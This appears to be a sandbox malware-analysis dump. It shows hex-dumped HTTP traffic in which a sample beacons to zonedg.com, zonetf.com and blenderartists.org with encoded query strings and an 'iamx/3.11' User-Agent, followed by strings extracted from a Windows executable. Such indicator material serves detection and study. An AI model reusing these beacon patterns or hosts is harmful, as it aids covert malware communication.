0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427651 7631656a 62777667 53393137   fBvQv1ejbwvgS917
0x00000040 (00064)   57363572 4a716c4c 66675069 57573163   W65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a44 304f704c 6a527141   .11....D0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a443468 2532424f   ose......D4h%2BO
0x00000160 (00352)   574a3971 30533242 6f4d4a44 77495472   WJ9q0S2BoMJDwITr
0x00000170 (00368)   72253242 25324645 4b726672 42253242   r%2B%2FEKrfrB%2B
0x00000180 (00384)   37574331 6f567245 64592532 42324479   7WC1oVrEdY%2B2Dy
0x00000190 (00400)   54574c63 4a514539 43557420 48545450   TWLcJQE9CUt HTTP
0x000001a0 (00416)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x000001b0 (00432)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x000001c0 (00448)   6c656e64 65726172 74697374 732e6f72   lenderartists.or
0x000001d0 (00464)   670d0a41 63636570 743a202a 2f2a0d0a   g..Accept: */*..
0x000001e0 (00480)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000001f0 (00496)   2f332e31 310d0a0d 0a                  /3.11....


Strings
U(
...
.
.

040904b0
1051
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
02&PhG
1j	=Y\
1YxMdk
2t	!Nq	
3?3~37K
3?3}37K
3?3o3%K
3?3x37K
3?3y30K
3Rich6K
&3=t^U
***=4;
{=]+{5
5%84;/
6@?0Q5
$:6_;P
*,7dzS
8A4bA`
8?on=O
8v!cF>ND-"
9)\+M_S
9wm{:Vb2
A|4f\;
#A|>$8
Ak!P|Wf
AlphaBlend
a[&rc$t
>AT[E~
b5FP=8y
BitBlt
(CD4,/
ClipCursor
CLnjPM
CoCreateInstance
CoFreeUnusedLibraries
CoInitialize
COMCTL32.dll
CoUninitialize
CreateBitmap
CreateCompatibleDC
CreateDCW
CreateDIBSection
CreatePen
CreatePopupMenu
|~cRSg
(%D4V>
@.data
DeleteDC
DestroyMenu
dR;kb3A3m
d+wjFz
]*/;EC
eNaEK9
EnumResourceNamesW
E,w|it?D
ExitProcess
E,^yfG
fD+h_M
\F%DZV
FindWindowA
F=sCutB
%fVcLw[
GDI32.dll
GdipCreateBitmapFromFile
GdipDisposeImage
GdipGetImageHeight
GdipGetImagePixelFormat
GdipGetImageWidth
gdiplus.dll
g&E	eCb)
GetDesktopWindow
GetHandleInformation
GetModuleFileNameA
GetObjectType
GetVersionExA
gFh^#Jhn
gU_}_q
GYa-uo
g\y;B-
&HE=})
<h.h#k@
HKH*)N
ilxznh
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
iXYb]H
J(?*lmm
'j/ZeW
(K<-^<
KERNEL32.dll
~kGK'w
<l	H($
LineTo
LoadLibraryW
LocalAlloc
LocalFree
lx"GzM
~M9Q{=
M(.h/t@
MN/O5J!
MNz;_e
Mox8y,>
MSIMG32.dll
mXWmh?a
"(mYk*
n3	26%
_nL>Oi
nn;tr]mr
%nW\=F
o&7U/tk&
ole32.dll
oqUbE?
OW@]^!
pb38l=
!PE9o{5
Q-{HWx
**^qlE
?Q}qDq*
qu2op1+
qV`Pq;
`.rdata
RedrawWindow
rN4l$K
roarAA
s4}1O7
:;SAJc
sB@R@e
SelectObject
SetStretchBltMode
sLo"*L
s`m^#u
StretchBlt
StringFromGUID2
T9U(.h&
=T+D1(
!This program cannot be run in DOS mode.
ThLibr
ThLoad
timeGetTime
TrackPopupMenuEx
TransmitCommChar
TransparentBlt
TS.hNo@
,?TT.h
%tWPE,
u7rGGr
UN.^nS
USER32.dll
V,5h?U
v-_%C#
VF#	)#sH
V)hk8u?
V!k4|G
VR1Ods
V/.^*U#
w8siWu
W<C?oc
~wD3&+4>
WINMM.dll
X*gDT8
Xlo0`U
%^x\|P\
xrXsim.
XXM>/1
$[YP79
;:\?}Ys
z2Kkfv
?/Z\_+9*
Z<]9S;
.z[.#l
Z N0i\